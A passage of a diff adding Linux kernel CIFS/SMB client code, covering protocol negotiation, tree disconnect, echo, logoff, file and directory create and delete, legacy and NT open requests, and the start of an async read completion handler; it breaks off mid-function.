++	} else if (pSMBr->hdr.WordCount != 17) {
++		/* unknown wct */
++		rc = -EOPNOTSUPP;
++		goto neg_err_exit;
++	}
++	/* else wct == 17, NTLM or better */
++
++	server->sec_mode = pSMBr->SecurityMode;
++	if ((server->sec_mode & SECMODE_USER) == 0)
++		cifs_dbg(FYI, "share mode security\n");
++
++	/* one byte, so no need to convert this or EncryptionKeyLen from
++	   little endian */
++	server->maxReq = min_t(unsigned int, le16_to_cpu(pSMBr->MaxMpxCount),
++			       cifs_max_pending);
++	set_credits(server, server->maxReq);
++	/* probably no need to store and check maxvcs */
++	server->maxBuf = le32_to_cpu(pSMBr->MaxBufferSize);
++	/* set up max_read for readahead check */
++	server->max_read = server->maxBuf;
++	server->max_rw = le32_to_cpu(pSMBr->MaxRawSize);
++	cifs_dbg(NOISY, "Max buf = %d\n", ses->server->maxBuf);
++	server->capabilities = le32_to_cpu(pSMBr->Capabilities);
++	server->timeAdj = (int)(__s16)le16_to_cpu(pSMBr->ServerTimeZone);
++	server->timeAdj *= 60;
++
++	if (pSMBr->EncryptionKeyLength == CIFS_CRYPTO_KEY_SIZE) {
++		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
++		memcpy(ses->server->cryptkey, pSMBr->u.EncryptionKey,
++		       CIFS_CRYPTO_KEY_SIZE);
++	} else if (pSMBr->hdr.Flags2 & SMBFLG2_EXT_SEC ||
++			server->capabilities & CAP_EXTENDED_SECURITY) {
++		server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
++		rc = decode_ext_sec_blob(ses, pSMBr);
++	} else if (server->sec_mode & SECMODE_PW_ENCRYPT) {
++		rc = -EIO; /* no crypt key only if plain text pwd */
++	} else {
++		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
++		server->capabilities &= ~CAP_EXTENDED_SECURITY;
++	}
++
++	if (!rc)
++		rc = cifs_enable_signing(server, ses->sign);
++neg_err_exit:
++	cifs_buf_release(pSMB);
++
++	cifs_dbg(FYI, "negprot rc %d\n", rc);
++	return rc;
++}
++
++int
++CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon)
++{
++	struct smb_hdr *smb_buffer;
++	int rc = 0;
++
++	cifs_dbg(FYI, "In tree disconnect\n");
++
++	/* BB: do we need to check this? These should never be NULL. */
++	if ((tcon->ses == NULL) || (tcon->ses->server == NULL))
++		return -EIO;
++
++	/*
++	 * No need to return error on this operation if tid invalidated and
++	 * closed on server already e.g. due to tcp session crashing. Also,
++	 * the tcon is no longer on the list, so no need to take lock before
++	 * checking this.
++	 */
++	spin_lock(&tcon->ses->chan_lock);
++	if ((tcon->need_reconnect) || CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses)) {
++		spin_unlock(&tcon->ses->chan_lock);
++		return -EIO;
++	}
++	spin_unlock(&tcon->ses->chan_lock);
++
++	rc = small_smb_init(SMB_COM_TREE_DISCONNECT, 0, tcon,
++			    (void **)&smb_buffer);
++	if (rc)
++		return rc;
++
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *)smb_buffer, 0);
++	cifs_small_buf_release(smb_buffer);
++	if (rc)
++		cifs_dbg(FYI, "Tree disconnect failed %d\n", rc);
++
++	/* No need to return error on this operation if tid invalidated and
++	   closed on server already e.g. due to tcp session crashing */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
++/*
++ * This is a no-op for now. We're not really interested in the reply, but
++ * rather in the fact that the server sent one and that server->lstrp
++ * gets updated.
++ *
++ * FIXME: maybe we should consider checking that the reply matches request?
++ */
++static void
++cifs_echo_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->callback_data;
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	release_mid(mid);
++	add_credits(server, &credits, CIFS_ECHO_OP);
++}
++
++int
++CIFSSMBEcho(struct TCP_Server_Info *server)
++{
++	ECHO_REQ *smb;
++	int rc = 0;
++	struct kvec iov[2];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 2 };
++
++	cifs_dbg(FYI, "In echo request\n");
++
++	rc = small_smb_init(SMB_COM_ECHO, 0, NULL, (void **)&smb);
++	if (rc)
++		return rc;
++
++	if (server->capabilities & CAP_UNICODE)
++		smb->hdr.Flags2 |= SMBFLG2_UNICODE;
++
++	/* set up echo request */
++	smb->hdr.Tid = 0xffff;
++	smb->hdr.WordCount = 1;
++	put_unaligned_le16(1, &smb->EchoCount);
++	put_bcc(1, &smb->hdr);
++	smb->Data[0] = 'a';
++	inc_rfc1001_len(smb, 3);
++
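++	/* iov[0] holds the 4-byte RFC1002 length field; iov[1] the SMB itself */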
++	iov[0].iov_len = 4;
++	iov[0].iov_base = smb;
++	iov[1].iov_len = get_rfc1002_length(smb);
++	iov[1].iov_base = (char *)smb + 4;
++
++	rc = cifs_call_async(server, &rqst, NULL, cifs_echo_callback, NULL,
++			     server, CIFS_NON_BLOCKING | CIFS_ECHO_OP, NULL);
++	if (rc)
++		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
++
++	cifs_small_buf_release(smb);
++
++	return rc;
++}
++
++int
++CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses)
++{
++	LOGOFF_ANDX_REQ *pSMB;
++	int rc = 0;
++
++	cifs_dbg(FYI, "In SMBLogoff for session disconnect\n");
++
++	/*
++	 * BB: do we need to check validity of ses and server? They should
++	 * always be valid since we have an active reference. If not, that
++	 * should probably be a BUG()
++	 */
++	if (!ses || !ses->server)
++		return -EIO;
++
++	mutex_lock(&ses->session_mutex);
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++		spin_unlock(&ses->chan_lock);
++		/* no need to send SMBlogoff if uid already closed due to reconnect */
++		goto session_already_dead;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	rc = small_smb_init(SMB_COM_LOGOFF_ANDX, 2, NULL, (void **)&pSMB);
++	if (rc) {
++		mutex_unlock(&ses->session_mutex);
++		return rc;
++	}
++
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++
++	if (ses->server->sign)
++		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	pSMB->hdr.Uid = ses->Suid;
++
++	pSMB->AndXCommand = 0xFF;
++	rc = SendReceiveNoRsp(xid, ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++session_already_dead:
++	mutex_unlock(&ses->session_mutex);
++
++	/*
++	 * If the session is dead then we do not need to do ulogoff, since
++	 * the server closed the smb session; no sense reporting an error.
++	 */
++	if (rc == -EAGAIN)
++		rc = 0;
++	return rc;
++}
++
++int
++CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *fileName, __u16 type,
++		 const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	struct unlink_psx_rq *pRqD;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In POSIX delete\n");
++PsxDelete:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = 0; /* BB double check this with jra */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/*
++	 * Set up the pointer to the Request Data (inode type). Note that
++	 * SMB offsets are from the beginning of the SMB, which is 4 bytes
++	 * in, after the RFC1001 field.
++	 */
++	pRqD = (struct unlink_psx_rq *)((char *)(pSMB) + offset + 4);
++	pRqD->type = cpu_to_le16(type);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + sizeof(struct unlink_psx_rq);
++
++	pSMB->DataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
++	pSMB->TotalDataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_UNLINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Posix delete returned %d\n", rc);
++	cifs_buf_release(pSMB);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
++
++	if (rc == -EAGAIN)
++		goto PsxDelete;
++
++	return rc;
++}
++
++int
++CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	       struct cifs_sb_info *cifs_sb)
++{
++	DELETE_FILE_REQ *pSMB = NULL;
++	DELETE_FILE_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++DelFileRetry:
++	rc = smb_init(SMB_COM_DELETE, 1, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->fileName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->fileName, name);
++	}
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM);
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
++	if (rc)
++		cifs_dbg(FYI, "Error in RMFile = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto DelFileRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	     struct cifs_sb_info *cifs_sb)
++{
++	DELETE_DIRECTORY_REQ *pSMB = NULL;
++	DELETE_DIRECTORY_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBRmDir\n");
++RmDirRetry:
++	rc = smb_init(SMB_COM_DELETE_DIRECTORY, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->DirName, name);
++	}
++
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_rmdirs);
++	if (rc)
++		cifs_dbg(FYI, "Error in RMDir = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto RmDirRetry;
++	return rc;
++}
++
++int
++CIFSSMBMkDir(const unsigned int xid, struct inode *inode, umode_t mode,
++	     struct cifs_tcon *tcon, const char *name,
++	     struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	CREATE_DIRECTORY_REQ *pSMB = NULL;
++	CREATE_DIRECTORY_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBMkDir\n");
++MkDirRetry:
++	rc = smb_init(SMB_COM_CREATE_DIRECTORY, 0, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->DirName, name,
++					      PATH_MAX, cifs_sb->local_nls,
++					      remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->DirName, name);
++	}
++
++	pSMB->BufferFormat = 0x04;
++	inc_rfc1001_len(pSMB, name_len + 1);
++	pSMB->ByteCount = cpu_to_le16(name_len + 1);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_mkdirs);
++	if (rc)
++		cifs_dbg(FYI, "Error in Mkdir = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto MkDirRetry;
++	return rc;
++}
++
++int
++CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
++		__u32 posix_flags, __u64 mode, __u16 *netfid,
++		FILE_UNIX_BASIC_INFO *pRetData, __u32 *pOplock,
++		const char *name, const struct nls_table *nls_codepage,
++		int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++	OPEN_PSX_REQ *pdata;
++	OPEN_PSX_RSP *psx_rsp;
++
++	cifs_dbg(FYI, "In POSIX Create\n");
++PsxCreat:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, name);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(OPEN_PSX_REQ);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);	/* large enough */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	pdata = (OPEN_PSX_REQ *)((char *)(pSMB) + offset + 4);
++	pdata->Level = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
++	pdata->Permissions = cpu_to_le64(mode);
++	pdata->PosixOpenFlags = cpu_to_le32(posix_flags);
++	pdata->OpenFlags =  cpu_to_le32(*pOplock);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_OPEN);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Posix create returned %d\n", rc);
++		goto psx_create_err;
++	}
++
++	cifs_dbg(FYI, "copying inode info\n");
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++	if (rc || get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)) {
++		rc = -EIO;	/* bad smb */
++		goto psx_create_err;
++	}
++
++	/* copy return information to pRetData */
++	psx_rsp = (OPEN_PSX_RSP *)((char *) &pSMBr->hdr.Protocol
++			+ le16_to_cpu(pSMBr->t2.DataOffset));
++
++	*pOplock = le16_to_cpu(psx_rsp->OplockFlags);
++	if (netfid)
++		*netfid = psx_rsp->Fid;   /* cifs fid stays in le */
++	/* Let caller know file was created so we can set the mode. */
++	/* Do we care about the CreateAction in any other cases? */
++	if (cpu_to_le32(FILE_CREATE) == psx_rsp->CreateAction)
++		*pOplock |= CIFS_CREATE_ACTION;
++	/* check to make sure response data is there */
++	if (psx_rsp->ReturnedLevel != cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC)) {
++		pRetData->Type = cpu_to_le32(-1); /* unknown */
++		cifs_dbg(NOISY, "unknown type\n");
++	} else {
++		if (get_bcc(&pSMBr->hdr) < sizeof(OPEN_PSX_RSP)
++					+ sizeof(FILE_UNIX_BASIC_INFO)) {
++			cifs_dbg(VFS, "Open response data too small\n");
++			pRetData->Type = cpu_to_le32(-1);
++			goto psx_create_err;
++		}
++		memcpy((char *) pRetData,
++			(char *)psx_rsp + sizeof(OPEN_PSX_RSP),
++			sizeof(FILE_UNIX_BASIC_INFO));
++	}
++
++psx_create_err:
++	cifs_buf_release(pSMB);
++
++	if (posix_flags & SMB_O_DIRECTORY)
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixmkdirs);
++	else
++		cifs_stats_inc(&tcon->stats.cifs_stats.num_posixopens);
++
++	if (rc == -EAGAIN)
++		goto PsxCreat;
++
++	return rc;
++}
++
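++/* Map an NT create disposition to the legacy SMBOPEN OpenFunction flags */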
++static __u16 convert_disposition(int disposition)
++{
++	__u16 ofun = 0;
++
++	switch (disposition) {
++		case FILE_SUPERSEDE:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
++			break;
++		case FILE_OPEN:
++			ofun = SMBOPEN_OAPPEND;
++			break;
++		case FILE_CREATE:
++			ofun = SMBOPEN_OCREATE;
++			break;
++		case FILE_OPEN_IF:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OAPPEND;
++			break;
++		case FILE_OVERWRITE:
++			ofun = SMBOPEN_OTRUNC;
++			break;
++		case FILE_OVERWRITE_IF:
++			ofun = SMBOPEN_OCREATE | SMBOPEN_OTRUNC;
++			break;
++		default:
++			cifs_dbg(FYI, "unknown disposition %d\n", disposition);
++			ofun =  SMBOPEN_OAPPEND; /* regular open */
++	}
++	return ofun;
++}
++
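++/* Map generic access flags to the legacy SMBOPEN access mode */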
++static int
++access_flags_to_smbopen_mode(const int access_flags)
++{
++	int masked_flags = access_flags & (GENERIC_READ | GENERIC_WRITE);
++
++	if (masked_flags == GENERIC_READ)
++		return SMBOPEN_READ;
++	else if (masked_flags == GENERIC_WRITE)
++		return SMBOPEN_WRITE;
++
++	/* just go for read/write */
++	return SMBOPEN_READWRITE;
++}
++
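++/* Open a file via OpenX (SMB_COM_OPEN_ANDX) for servers using old dialects */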
++int
++SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *fileName, const int openDisposition,
++	    const int access_flags, const int create_options, __u16 *netfid,
++	    int *pOplock, FILE_ALL_INFO *pfile_info,
++	    const struct nls_table *nls_codepage, int remap)
++{
++	int rc;
++	OPENX_REQ *pSMB = NULL;
++	OPENX_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len;
++	__u16 count;
++
++OldOpenRetry:
++	rc = smb_init(SMB_COM_OPEN_ANDX, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->AndXCommand = 0xFF;       /* none */
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		count = 1;      /* account for one byte pad to word boundary */
++		name_len =
++		   cifsConvertToUTF16((__le16 *) (pSMB->fileName + 1),
++				      fileName, PATH_MAX, nls_codepage, remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		count = 0;      /* no pad */
++		name_len = copy_path_name(pSMB->fileName, fileName);
++	}
++	if (*pOplock & REQ_OPLOCK)
++		pSMB->OpenFlags = cpu_to_le16(REQ_OPLOCK);
++	else if (*pOplock & REQ_BATCHOPLOCK)
++		pSMB->OpenFlags = cpu_to_le16(REQ_BATCHOPLOCK);
++
++	pSMB->OpenFlags |= cpu_to_le16(REQ_MORE_INFO);
++	pSMB->Mode = cpu_to_le16(access_flags_to_smbopen_mode(access_flags));
++	pSMB->Mode |= cpu_to_le16(0x40); /* deny none */
++	/*
++	 * Set file as system file if special file such as fifo and server
++	 * expecting SFU style and no Unix extensions.
++	 */
++	if (create_options & CREATE_OPTION_SPECIAL)
++		pSMB->FileAttributes = cpu_to_le16(ATTR_SYSTEM);
++	else /* BB FIXME BB */
++		pSMB->FileAttributes = cpu_to_le16(0/*ATTR_NORMAL*/);
++
++	if (create_options & CREATE_OPTION_READONLY)
++		pSMB->FileAttributes |= cpu_to_le16(ATTR_READONLY);
++
++	/* BB FIXME BB */
++/*	pSMB->CreateOptions = cpu_to_le32(create_options &
++						 CREATE_OPTIONS_MASK); */
++	/* BB FIXME END BB */
++
++	pSMB->Sattr = cpu_to_le16(ATTR_HIDDEN | ATTR_SYSTEM | ATTR_DIRECTORY);
++	pSMB->OpenFunction = cpu_to_le16(convert_disposition(openDisposition));
++	count += name_len;
++	inc_rfc1001_len(pSMB, count);
++
++	pSMB->ByteCount = cpu_to_le16(count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *)pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
++	if (rc) {
++		cifs_dbg(FYI, "Error in Open = %d\n", rc);
++	} else {
++	/* BB verify if wct == 15 */
++
++/*		*pOplock = pSMBr->OplockLevel; */ /* BB take from action field*/
++
++		*netfid = pSMBr->Fid;   /* cifs fid stays in le */
++		/* Let caller know file was created so we can set the mode. */
++		/* Do we care about the CreateAction in any other cases? */
++	/* BB FIXME BB */
++/*		if (cpu_to_le32(FILE_CREATE) == pSMBr->CreateAction)
++			*pOplock |= CIFS_CREATE_ACTION; */
++	/* BB FIXME END */
++
++		if (pfile_info) {
++			pfile_info->CreationTime = 0; /* BB convert CreateTime*/
++			pfile_info->LastAccessTime = 0; /* BB fixme */
++			pfile_info->LastWriteTime = 0; /* BB fixme */
++			pfile_info->ChangeTime = 0;  /* BB fixme */
++			pfile_info->Attributes =
++				cpu_to_le32(le16_to_cpu(pSMBr->FileAttributes));
++			/* the file_info buf is endian converted by caller */
++			pfile_info->AllocationSize =
++				cpu_to_le64(le32_to_cpu(pSMBr->EndOfFile));
++			pfile_info->EndOfFile = pfile_info->AllocationSize;
++			pfile_info->NumberOfLinks = cpu_to_le32(1);
++			pfile_info->DeletePending = 0;
++		}
++	}
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto OldOpenRetry;
++	return rc;
++}
++
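++/* Open or create a file via NTCreateX (SMB_COM_NT_CREATE_ANDX) */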
++int
++CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms, int *oplock,
++	  FILE_ALL_INFO *buf)
++{
++	int rc;
++	OPEN_REQ *req = NULL;
++	OPEN_RSP *rsp = NULL;
++	int bytes_returned;
++	int name_len;
++	__u16 count;
++	struct cifs_sb_info *cifs_sb = oparms->cifs_sb;
++	struct cifs_tcon *tcon = oparms->tcon;
++	int remap = cifs_remap(cifs_sb);
++	const struct nls_table *nls = cifs_sb->local_nls;
++	int create_options = oparms->create_options;
++	int desired_access = oparms->desired_access;
++	int disposition = oparms->disposition;
++	const char *path = oparms->path;
++
++openRetry:
++	rc = smb_init(SMB_COM_NT_CREATE_ANDX, 24, tcon, (void **)&req,
++		      (void **)&rsp);
++	if (rc)
++		return rc;
++
++	/* no commands go after this */
++	req->AndXCommand = 0xFF;
++
++	if (req->hdr.Flags2 & SMBFLG2_UNICODE) {
++		/* account for one byte pad to word boundary */
++		count = 1;
++		name_len = cifsConvertToUTF16((__le16 *)(req->fileName + 1),
++					      path, PATH_MAX, nls, remap);
++		/* trailing null */
++		name_len++;
++		name_len *= 2;
++		req->NameLength = cpu_to_le16(name_len);
++	} else {
++		/* BB improve check for buffer overruns BB */
++		/* no pad */
++		count = 0;
++		name_len = copy_path_name(req->fileName, path);
++		req->NameLength = cpu_to_le16(name_len);
++	}
++
++	if (*oplock & REQ_OPLOCK)
++		req->OpenFlags = cpu_to_le32(REQ_OPLOCK);
++	else if (*oplock & REQ_BATCHOPLOCK)
++		req->OpenFlags = cpu_to_le32(REQ_BATCHOPLOCK);
++
++	req->DesiredAccess = cpu_to_le32(desired_access);
++	req->AllocationSize = 0;
++
++	/*
++	 * Set file as system file if special file such as fifo and server
++	 * expecting SFU style and no Unix extensions.
++	 */
++	if (create_options & CREATE_OPTION_SPECIAL)
++		req->FileAttributes = cpu_to_le32(ATTR_SYSTEM);
++	else
++		req->FileAttributes = cpu_to_le32(ATTR_NORMAL);
++
++	/*
++	 * XP does not handle ATTR_POSIX_SEMANTICS but it helps speed up case
++	 * sensitive checks for other servers such as Samba.
++	 */
++	if (tcon->ses->capabilities & CAP_UNIX)
++		req->FileAttributes |= cpu_to_le32(ATTR_POSIX_SEMANTICS);
++
++	if (create_options & CREATE_OPTION_READONLY)
++		req->FileAttributes |= cpu_to_le32(ATTR_READONLY);
++
++	req->ShareAccess = cpu_to_le32(FILE_SHARE_ALL);
++	req->CreateDisposition = cpu_to_le32(disposition);
++	req->CreateOptions = cpu_to_le32(create_options & CREATE_OPTIONS_MASK);
++
++	/* BB Experiment with various impersonation levels and verify */
++	req->ImpersonationLevel = cpu_to_le32(SECURITY_IMPERSONATION);
++	req->SecurityFlags = SECURITY_CONTEXT_TRACKING|SECURITY_EFFECTIVE_ONLY;
++
++	count += name_len;
++	inc_rfc1001_len(req, count);
++
++	req->ByteCount = cpu_to_le16(count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *)req,
++			 (struct smb_hdr *)rsp, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_opens);
++	if (rc) {
++		cifs_dbg(FYI, "Error in Open = %d\n", rc);
++		cifs_buf_release(req);
++		if (rc == -EAGAIN)
++			goto openRetry;
++		return rc;
++	}
++
++	/* 1 byte no need to le_to_cpu */
++	*oplock = rsp->OplockLevel;
++	/* cifs fid stays in le */
++	oparms->fid->netfid = rsp->Fid;
++	oparms->fid->access = desired_access;
++
++	/* Let caller know file was created so we can set the mode. */
++	/* Do we care about the CreateAction in any other cases? */
++	if (cpu_to_le32(FILE_CREATE) == rsp->CreateAction)
++		*oplock |= CIFS_CREATE_ACTION;
++
++	if (buf) {
++		/* copy from CreationTime to Attributes */
++		memcpy((char *)buf, (char *)&rsp->CreationTime, 36);
++		/* the file_info buf is endian converted by caller */
++		buf->AllocationSize = rsp->AllocationSize;
++		buf->EndOfFile = rsp->EndOfFile;
++		buf->NumberOfLinks = cpu_to_le32(1);
++		buf->DeletePending = 0;
++	}
++
++	cifs_buf_release(req);
++	return rc;
++}
++
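++/*
++ * Completion handler for async reads: verify the signature if signing is
++ * in use, account the bytes read, then queue the work item for the caller.
++ */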
++static void
++cifs_readv_callback(struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct smb_rqst rqst = { .rq_iov = rdata->iov,
++				 .rq_nvec = 2,
++				 .rq_pages = rdata->pages,
++				 .rq_offset = rdata->page_offset,
++				 .rq_npages = rdata->nr_pages,
++				 .rq_pagesz = rdata->pagesz,
++				 .rq_tailsz = rdata->tailsz };
++	struct cifs_credits credits = { .value = 1, .instance = 0 };
++
++	cifs_dbg(FYI, "%s: mid=%llu state=%d result=%d bytes=%u\n",
++		 __func__, mid->mid, mid->mid_state, rdata->result,
++		 rdata->bytes);
++
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		/* result already set, check signature */
++		if (server->sign) {
++			int rc = 0;
++
++			rc = cifs_verify_signature(&rqst, server,
++						  mid->sequence_number);
++			if (rc)
++				cifs_dbg(VFS, "SMB signature verification returned error = %d\n",
++					 rc);
++		}
++		/* FIXME: should this be counted toward the initiating task? */
++		task_io_account_read(rdata->got_bytes);
